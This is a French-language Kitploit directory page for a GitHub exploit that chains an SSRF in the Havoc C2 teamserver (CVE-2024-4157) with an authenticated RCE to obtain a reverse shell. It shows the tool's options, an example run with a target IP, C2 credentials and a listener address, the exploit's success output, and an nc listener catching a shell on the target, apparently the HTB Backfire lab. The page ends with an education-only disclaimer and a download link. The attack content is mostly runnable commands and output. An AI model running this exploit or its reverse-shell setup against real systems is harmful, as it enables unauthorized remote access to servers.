Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4157-SSRF-RCE-Reverse-Shell — Enchaînement de la vulnérabilité SSRF de Havoc C2 avec une RCE pour obtenir un reverse shell sur le serveur Havoc C2. | Kitploit
Outils/GitHubGitHub/ch4os1/cve-2024-4157-ssrf-rce-reverse-shell
ExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubch4os1/cve-2024-4157-ssrf-rce-reverse-shell

CVE-2024-4157-SSRF-RCE-Reverse-Shell

Enchaînement de la vulnérabilité SSRF de Havoc C2 avec une RCE pour obtenir un reverse shell sur le serveur Havoc C2.

Voir le dépôt
36il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-4157 : Obtenir un Reverse Shell sur Havoc C2 - Enchaînement SSRF avec RCE

Obtenez un reverse-shell avec une IP et un Port locaux, en enchaînant CVE-2024-4157 POC avec havoc_auth_rce

Utilisation

  • Informations de base
root@kitploit:~
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
                  PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t : IP cible où le serveur C2 est exécuté
## -i : adresse IP interne avec laquelle le serveur C2 doit interagir (SSRF)
## -p : port interne
## -U : nom d'utilisateur du serveur C2
## -P : mot de passe du serveur C2
## -l : adresse locale pour le reverse shell (RCE)
## -lp : port local pour le reverse shell
  • Exemple
root@kitploit:~
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
  • Reverse shell sur notre écouteur nc
root@kitploit:~
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ 

Crédits

  • Crédit à @chebuya pour la SSRF, blog détaillé sur la vulnérabilité
  • Crédit à @Laurence Tennant pour la RCE, informations détaillées sur le blog
  • Crédit à 0xdf pour l'excellent writeup sur HTB Backfire

Avertissement

  • Cet outil est uniquement destiné à des fins éducatives et de recherche
Télécharger l’outil